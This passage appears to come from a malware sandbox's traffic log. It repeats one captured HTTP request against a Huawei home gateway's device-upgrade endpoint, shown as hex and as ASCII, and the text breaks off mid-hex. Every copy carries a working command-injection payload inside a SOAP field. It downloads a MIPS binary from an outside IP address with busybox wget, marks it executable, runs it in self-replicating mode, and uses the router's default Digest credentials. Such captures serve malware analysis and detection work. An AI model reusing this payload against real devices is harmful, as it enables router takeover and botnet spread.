69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 